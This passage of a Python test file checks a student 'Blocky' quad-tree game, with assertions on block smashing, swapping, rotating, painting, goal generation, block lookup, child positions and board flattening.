board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# Nothing at level 3
# a copy of the board
copy_board = board.create_copy()
assert board.smash() is False
assert board.children[0].smash() is False
assert id(copy_board) != id(board)
assert copy_board == board
assert board.smashable() is False
assert board.smash() is False
assert board.children[0].smash() is False
# swap vertically
assert board.swap(1) is True
assert board.children[0].colour == COLOUR_LIST[3]
assert board.children[1].colour == COLOUR_LIST[1]
assert board.children[2].colour == COLOUR_LIST[2]
assert board.children[3].colour is None
assert board.children[3].children[0].colour == COLOUR_LIST[1]
assert board.children[3].children[2].colour == COLOUR_LIST[3]
# swap vertically again
assert board.swap(1) is True
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[2].colour == COLOUR_LIST[1]
assert board.children[1].colour == COLOUR_LIST[2]
assert board.children[0].colour is None
assert board.children[0].children[0].colour == COLOUR_LIST[1]
assert board.children[0].children[2].colour == COLOUR_LIST[3]
assert board.children[1].swap(1) is False
assert board.children[1].swap(2) is False
assert copy_board == board
assert id(copy_board) != id(board)
# swap horizontally
assert board.swap(0) is True
assert board.children[2].colour == COLOUR_LIST[3]
assert board.children[3].colour == COLOUR_LIST[1]
assert board.children[0].colour == COLOUR_LIST[2]
assert board.children[1].colour is None
assert board.children[1].children[0].colour == COLOUR_LIST[1]
assert board.children[1].children[2].colour == COLOUR_LIST[3]
assert board.children[3].level - 1 == board.level
assert board.children[1].max_depth == board.max_depth
# swap horizontally again
assert board.swap(0) is True
assert copy_board == board
assert id(copy_board) != id(board)
assert board.children[0].swap(1) is True
assert board.children[0].swap(1) is True
assert board.children[0].swap(0) is True
assert board.children[0].swap(0) is True
# assert board.children[1].smash() is True
assert board.children[1].combine() is False
assert board.children[2].combine() is False
assert board.children[0].combine() is False
assert board.children[0].combine() is False
assert board.children[3].combine() is False
assert board.children[0].colour is None
assert board.children[1].colour == COLOUR_LIST[2]
#
assert board.children[3].combine() is False
assert board.children[3].combine() is False
assert board.children[3].colour == COLOUR_LIST[3]
def test_smash_and_paint_2() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 0)
assert board.level == board.max_depth
assert board.paint(COLOUR_LIST[1]) is False
assert board.paint(COLOUR_LIST[2]) is True
assert board.smash() is False
assert board.combine() is False
def test_smash_3() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.children == []
assert board.smash() is True
assert len(board.children) == 4
assert board.children[3].level - 1 == board.level
assert board.children[1].max_depth == board.max_depth
assert board.children[0].smash() is False
def test_rotate_4() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.rotate(1) is False
assert board.rotate(3) is False
def test_rotate_5() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 1)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
copy_board = board.create_copy()
# Rotate Clockwise
assert board.rotate(1) is True
assert board.children[0].colour == COLOUR_LIST[2]
assert board.children[1].colour == COLOUR_LIST[0]
assert board.children[2].colour == COLOUR_LIST[2]
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[1].level - 1 == board.level
assert board.children[3].level - 1 == board.level
assert board.paint(COLOUR_LIST[0]) is False
assert board.children[0].paint(COLOUR_LIST[2]) is False
assert board.children[0].paint(COLOUR_LIST[0]) is True
assert board.children[0].paint(COLOUR_LIST[2]) is True
    # Rotate Clockwise
assert board.rotate(1) is True
assert board.children[1].colour == COLOUR_LIST[2]
assert board.children[2].colour == COLOUR_LIST[3]
assert board.children[3].colour == COLOUR_LIST[2]
assert board.children[0].colour == COLOUR_LIST[0]
assert board.children[1].level - 1 == board.level
assert board.children[3].level - 1 == board.level
assert board.children[1].max_depth == board.max_depth
# Rotate Counter_clockwise
assert board.rotate(3) is True
assert board.children[0].colour == COLOUR_LIST[2]
assert board.children[1].colour == COLOUR_LIST[0]
assert board.children[2].colour == COLOUR_LIST[2]
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[1].level - 1 == board.level
assert board.children[3].level - 1 == board.level
# Rotate Counter-clockwise
assert board.rotate(3) is True
assert board == copy_board
def test_rotate_6() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
copy_board = board.create_copy()
assert board.children[0].combine() is False
assert board.children[2].combine() is False
# Rotate clockwise
assert board.rotate(1) is True
assert board.children[0].colour is None
assert board.children[1].colour == COLOUR_LIST[0]
assert board.children[2].colour is None
assert board.children[3].colour == COLOUR_LIST[3]
assert board.children[1].level - 1 == board.level
assert board.children[0].children[0].colour == COLOUR_LIST[2]
assert board.children[0].children[1].colour == COLOUR_LIST[0]
assert board.children[0].children[2].colour == COLOUR_LIST[2]
assert board.children[0].children[3].colour == COLOUR_LIST[1]
assert board.children[0].children[2].level - 2 == board.level
assert board.children[0].children[0].rotate(1) is False
assert board.paint(COLOUR_LIST[2]) is False
assert board.children[3].paint(COLOUR_LIST[3]) is False
assert board.children[3].paint(COLOUR_LIST[0]) is False
assert board.children[0].children[3].paint(COLOUR_LIST[1]) is False
assert board.children[0].children[0].paint(COLOUR_LIST[1]) is True
assert board.children[0].children[0].paint(COLOUR_LIST[2]) is True
assert board.children[2].children[0].colour == COLOUR_LIST[1]
assert board.children[2].children[1].colour == COLOUR_LIST[3]
assert board.children[2].children[2].colour == COLOUR_LIST[2]
assert board.children[2].children[3].colour == COLOUR_LIST[0]
assert board.children[2].children[2].level - 2 == board.level
assert board.children[2].children[0].rotate(1) is False
copy_copy_no1 = board.create_copy()
# Rotate clockwise again
assert board.rotate(1) is True
assert board.children[3].colour is None
assert board.children[0].colour == COLOUR_LIST[0]
assert board.children[1].colour is None
assert board.children[2].colour == COLOUR_LIST[3]
assert board.children[3].children[3].colour == COLOUR_LIST[2]
assert board.children[3].children[0].colour == COLOUR_LIST[0]
assert board.children[3].children[1].colour == COLOUR_LIST[2]
assert board.children[3].children[2].colour == COLOUR_LIST[1]
assert board.children[3].children[2].level - 2 == board.level
assert board.children[3].children[0].rotate(1) is False
assert board.children[1].children[3].colour == COLOUR_LIST[1]
assert board.children[1].children[0].colour == COLOUR_LIST[3]
assert board.children[1].children[1].colour == COLOUR_LIST[2]
assert board.children[1].children[2].colour == COLOUR_LIST[0]
assert board.children[1].children[2].level - 2 == board.level
assert board.children[1].children[0].rotate(1) is False
# Rotate Counter-clockwise
assert board.rotate(3) is True
assert copy_copy_no1 == board
# Rotate Counter-clockwise
assert board.rotate(3) is True
assert copy_board == board
assert board.children[1].combine() is True
assert board.children[1].combine() is False
assert board.children[1].colour == COLOUR_LIST[2]
assert board.children[3].combine() is False
assert board.children[3].combine() is False
assert board.children[0].colour == COLOUR_LIST[3]
def test_paint_7() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.paint(COLOUR_LIST[2]) is False
assert board.combine() is False
# TODO: ~~~~~~ TASK 2 ~~~~~~ ~~~~~~ TASK 2 ~~~~~~ ~~~~~~ TASK 2 ~~~~~~
def test_smash8() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3]]
set_children(board, colours)
copy_board = board.create_copy()
assert board.children[0].smash() is True
assert board.children[0].smash() is False
assert board.children[0].children[0].smash() is False
assert board.children[3].position == (375, 375)
assert board.children[2].position == (0, 375)
assert board.children[0].children[0].position == (563, 0)
assert board.children[0].children[1].position == (375, 0)
assert board.children[0].children[2].position == (375, 188)
assert board.children[0].children[3].position == (563, 188)
def test_smash_9() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 0)
assert board.smash() is False
assert board.smash() is False
def test_smash_10() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
assert board.smash() is True
assert board.children[0].position == (375, 0)
assert board.children[1].position == (0, 0)
assert board.children[2].position == (0, 375)
assert board.children[3].position == (375, 375)
assert board.children[0].smash() is False
assert board.children[2].smash() is False
def test_block_to_squares_11() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
block_squares = _block_to_squares(board)
assert len(block_squares) == 4
assert ((COLOUR_LIST[3]), (375, 0), 375) in block_squares
assert ((COLOUR_LIST[2]), (0, 0), 375) in block_squares
assert ((COLOUR_LIST[0]), (0, 375), 375) in block_squares
assert ((COLOUR_LIST[2]), (375, 375), 375) in block_squares
def test_block_to_squares_12() -> None:
# level 0
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
# Level 1
block_squares = _block_to_squares(board)
assert len(block_squares) == 1
assert (COLOUR_LIST[1], (0, 0), 750) in block_squares
def test_block_to_squares_13() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# level 3
block_squares = _block_to_squares(board)
assert len(block_squares) == 7
assert (COLOUR_LIST[1], (563, 0), 188) in block_squares
assert (COLOUR_LIST[1], (375, 0), 188) in block_squares
assert (COLOUR_LIST[3], (375, 188), 188) in block_squares
assert (COLOUR_LIST[0], (563, 188), 188) in block_squares
assert (COLOUR_LIST[2], (0, 0), 375) in block_squares
assert (COLOUR_LIST[1], (0, 375), 375) in block_squares
assert (COLOUR_LIST[3], (375, 375), 375) in block_squares
def test_block_to_squares_14() -> None:
# Level 0
board = Block((0, 0), 1000, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
block_squares = _block_to_squares(board)
assert len(block_squares) == 10
assert (COLOUR_LIST[3], (500, 0), 500) in block_squares
assert (COLOUR_LIST[1], (250, 0), 250) in block_squares
assert (COLOUR_LIST[2], (0, 0), 250) in block_squares
assert (COLOUR_LIST[0], (0, 250), 250) in block_squares
assert (COLOUR_LIST[2], (250, 250), 250) in block_squares
assert (COLOUR_LIST[0], (0, 500), 500) in block_squares
assert (COLOUR_LIST[0], (750, 500), 250) in block_squares
assert (COLOUR_LIST[1], (500, 500), 250) in block_squares
assert (COLOUR_LIST[3], (500, 750), 250) in block_squares
assert (COLOUR_LIST[2], (750, 750), 250) in block_squares
# TODO: ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~
def test_generate_goals_15() -> None:
goal = generate_goals(2)
colour = COLOUR_LIST.copy()
assert len(goal) == 2
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
def test_generate_goals_16() -> None:
goal = generate_goals(0)
assert len(goal) == 0
assert goal == []
def test_generate_goals_17() -> None:
goal = generate_goals(4)
colour = COLOUR_LIST.copy()
assert len(goal) == 4
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 0
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 0
def test_generate_goals_18() -> None:
goal = generate_goals(3)
colour = COLOUR_LIST.copy()
assert len(goal) == 3
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 1
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 1
def test_generate_goals_19() -> None:
goal = generate_goals(1)
colour = COLOUR_LIST.copy()
assert len(goal) == 1
if isinstance(goal[0], PerimeterGoal):
for i in goal:
assert isinstance(i, PerimeterGoal)
assert i.colour in colour
colour.remove(i.colour)
assert len(colour) == 3
if isinstance(goal[0], BlobGoal):
for ii in goal:
assert isinstance(ii, BlobGoal)
assert ii.colour in colour
colour.remove(ii.colour)
assert len(colour) == 3
# TODO: ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~
def test_get_block_20() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# level 3
    # testing at level 0
assert _get_block(board, (0, 0), 0) == board
assert _get_block(board, (4, 94), 0) == board
assert _get_block(board, (9343, 32), 0) is None
assert _get_block(board, (750, 32), 0) is None
assert _get_block(board, (750, 0), 0) is None
assert _get_block(board, (750, 750), 0) is None
assert _get_block(board, (0, 750), 0) is None
    # testing at level 1
assert _get_block(board, (0, 0), 1) == board.children[1]
assert _get_block(board, (4, 94), 1) == board.children[1]
assert _get_block(board, (321, 94), 1) == board.children[1]
assert _get_block(board, (375, 94), 1) == board.children[0]
assert _get_block(board, (375, 375), 1) == board.children[3]
assert _get_block(board, (750, 750), 1) is None
assert _get_block(board, (400, 750), 1) is None
assert _get_block(board, (400, 300), 1) == board.children[0]
assert _get_block(board, (833, 0), 1) is None
assert _get_block(board, (500, 400), 1) == board.children[3]
    # testing at level 2
assert _get_block(board, (0, 0), 2) == board.children[1]
assert _get_block(board, (4, 94), 2) == board.children[1]
# assert _get_block(board, (375, 375), 2) == board.children[3] # TODO: THIS ASSERTION FAILED
assert _get_block(board, (375, 25), 2) == board.children[0].children[1]
assert _get_block(board, (375, 205), 2) == board.children[0].children[2]
assert _get_block(board, (375, 83), 2) == board.children[0].children[1]
assert _get_block(board, (375, 299), 2) == board.children[0].children[2]
assert _get_block(board, (400, 299), 2) == board.children[0].children[2]
assert _get_block(board, (600, 299), 2) == board.children[0].children[3]
assert _get_block(board, (600, 30), 2) == board.children[0].children[0]
assert _get_block(board, (600, 188), 2) == board.children[0].children[3]
assert _get_block(board, (563, 188), 2) == board.children[0].children[3]
assert _get_block(board, (563, 187), 2) == board.children[0].children[0]
assert _get_block(board, (600, 0), 2) == board.children[0].children[0]
assert _get_block(board, (943, 0), 2) is None
# above level 2
assert _get_block(board, (0, 0), 3) == board.children[1]
assert _get_block(board, (0, 0), 4) == board.children[1]
assert _get_block(board, (375, 25), 3) == board.children[0].children[1]
assert _get_block(board, (375, 205), 4) == board.children[0].children[2]
assert _get_block(board, (375, 83), 3) == board.children[0].children[1]
assert _get_block(board, (375, 299), 4) == board.children[0].children[2]
assert _get_block(board, (400, 299), 5) == board.children[0].children[2]
assert _get_block(board, (600, 299), 3) == board.children[0].children[3]
assert _get_block(board, (600, 30), 4) == board.children[0].children[0]
assert _get_block(board, (600, 188), 3) == board.children[0].children[3]
def test_get_block_21() -> None:
# level 0
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
# Level 1
    # testing at level 0
assert _get_block(board, (0, 0), 0) == board
assert _get_block(board, (321, 34), 0) == board
assert _get_block(board, (84, 34), 0) == board
assert _get_block(board, (184, 303), 0) == board
assert _get_block(board, (4, 303), 0) == board
assert _get_block(board, (43, 33), 0) == board
assert _get_block(board, (9, 3421), 0) is None
assert _get_block(board, (750, 0), 0) is None
assert _get_block(board, (0, 750), 0) is None
assert _get_block(board, (92, 750), 0) is None
assert _get_block(board, (750, 750), 0) is None
assert _get_block(board, (750, 93), 0) is None
# above level 0
assert _get_block(board, (0, 0), 1) == board
assert _get_block(board, (321, 34), 2) == board
assert _get_block(board, (84, 34), 1) == board
assert _get_block(board, (184, 303), 2) == board
assert _get_block(board, (4, 303), 1) == board
assert _get_block(board, (43, 33), 3) == board
assert _get_block(board, (9, 3421), 5) is None
assert _get_block(board, (750, 0), 1) is None
assert _get_block(board, (0, 750), 2) is None
assert _get_block(board, (92, 750), 1) is None
assert _get_block(board, (750, 750), 1) is None
assert _get_block(board, (750, 93), 1) is None
def test_get_block_22() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
# testing at level 0
assert _get_block(board, (1, 2), 0) == board
assert _get_block(board, (10, 22), 0) == board
assert _get_block(board, (10, 22), 0) == board
assert _get_block(board, (150, 22), 0) == board
assert _get_block(board, (250, 22), 0) == board
assert _get_block(board, (250, 220), 0) == board
assert _get_block(board, (163, 220), 0) == board
assert _get_block(board, (278, 89), 0) == board
assert _get_block(board, (500, 300), 0) == board
assert _get_block(board, (600, 300), 0) == board
assert _get_block(board, (520, 699), 0) == board
assert _get_block(board, (600, 700), 0) == board
assert _get_block(board, (500, 700), 0) == board
assert _get_block(board, (278, 300), 0) == board
# testing at level 1
assert _get_block(board, (500, 30), 1) == board.children[0]
assert _get_block(board, (10, 22), 1) == board.children[1]
assert _get_block(board, (10, 22), 1) == board.children[1]
assert _get_block(board, (150, 22), 1) == board.children[1]
assert _get_block(board, (250, 22), 1) == board.children[1]
assert _get_block(board, (500, 300), 1) == board.children[0]
assert _get_block(board, (600, 375), 1) == board.children[3]
assert _get_block(board, (520, 699), 1) == board.children[3]
assert _get_block(board, (600, 700), 1) == board.children[3]
assert _get_block(board, (500, 700), 1) == board.children[3]
# testing at level 2
assert _get_block(board, (1, 2), 2) == board.children[1].children[1]
assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
assert _get_block(board, (150, 22), 2) == board.children[1].children[1]
assert _get_block(board, (250, 22), 2) == board.children[1].children[0]
assert _get_block(board, (250, 220), 2) == board.children[1].children[3]
assert _get_block(board, (163, 220), 2) == board.children[1].children[2]
assert _get_block(board, (278, 89), 2) == board.children[1].children[0]
assert _get_block(board, (278, 300), 2) == board.children[1].children[3]
assert _get_block(board, (500, 300), 2) == board.children[0]
assert _get_block(board, (600, 300), 2) == board.children[0]
assert _get_block(board, (520, 699), 2) == board.children[3].children[2]
assert _get_block(board, (499, 699), 2) == board.children[3].children[2]
assert _get_block(board, (60, 700), 2) == board.children[2]
assert _get_block(board, (600, 700), 2) == board.children[3].children[3]
assert _get_block(board, (10, 700), 2) == board.children[2]
assert _get_block(board, (500, 700), 2) == board.children[3].children[2]
assert _get_block(board, (563, 7), 2) == board.children[0]
# TODO: ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~
def test_update_child_pos_23() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[3]]
set_children(board, colours)
board._update_children_positions((375, 375))
assert board.position == (375, 375)
assert board.children[0].position == (750, 375)
assert board.children[1].position == (375, 375)
assert board.children[2].position == (375, 750)
assert board.children[3].position == (750, 750)
def test_update_child_pos_24() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# Nothing at level 3
board._update_children_positions((1000, 1000))
assert board.position == (1000, 1000)
assert board.children[0].children[0].position == (1563, 1000)
assert board.children[0].children[1].position == (1375, 1000)
assert board.children[0].children[2].position == (1375, 1188)
assert board.children[0].children[3].position == (1563, 1188)
assert board.children[1].position == (1000, 1000)
assert board.children[2].position == (1000, 1375)
assert board.children[3].position == (1375, 1375)
def test_update_child_pos_25() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 1)
board._update_children_positions((750, 750))
assert board.position == (750, 750)
assert board.children == []
def test_update_child_pos_26() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
board._update_children_positions((1000, 1000))
assert board.position == (1000, 1000)
assert board.children[0].position == (1375, 1000)
assert board.children[2].position == (1000, 1375)
assert board.children[1].children[0].position == (1188, 1000)
assert board.children[1].children[1].position == (1000, 1000)
assert board.children[1].children[2].position == (1000, 1188)
assert board.children[1].children[3].position == (1188, 1188)
assert board.children[3].children[0].position == (1563, 1375)
assert board.children[3].children[1].position == (1375, 1375)
assert board.children[3].children[2].position == (1375, 1563)
assert board.children[3].children[3].position == (1563, 1563)
def test_update_child_pos_27() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[0], 0, 0)
board._update_children_positions((750, 750))
assert board.position == (750, 750)
assert board.children == []
# TODO: ~~~~~~ TASK 6 ~~~~~~ ~~~~~~ TASK 6 ~~~~~~ ~~~~~~ TASK 6 ~~~~~~
def test_flatten_28() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 3)
# Level 1
colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
set_children(board, colours1)
# Level 2
colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
set_children(board.children[0], colours2)
# Nothing at level 3
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]]]
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[1]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]],
[COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[3]]]
def test_flatten_29() -> None:
board = Block((0, 0), 750, COLOUR_LIST[1], 0, 0)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[1]]]
assert _flatten(copy_board) == [[COLOUR_LIST[1]]]
def test_flatten_30() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[1], COLOUR_LIST[3]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[0], COLOUR_LIST[2]]]
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[1], COLOUR_LIST[3]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[0], COLOUR_LIST[2]]]
def test_flatten_31() -> None:
# Level 0
board = Block((0, 0), 750, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board, colours)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]]]
assert _flatten(copy_board) == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[0]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[3], COLOUR_LIST[3], COLOUR_LIST[2], COLOUR_LIST[2]]]
def test_flatten_32() -> None:
# Level 0
board = Block((0, 0), 750, COLOUR_LIST[2], 0, 2)
copy_board = board.create_copy()
assert id(copy_board) != id(board)
flatten_board = _flatten(board)
assert flatten_board == [[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
[COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2], COLOUR_LIST[2]],
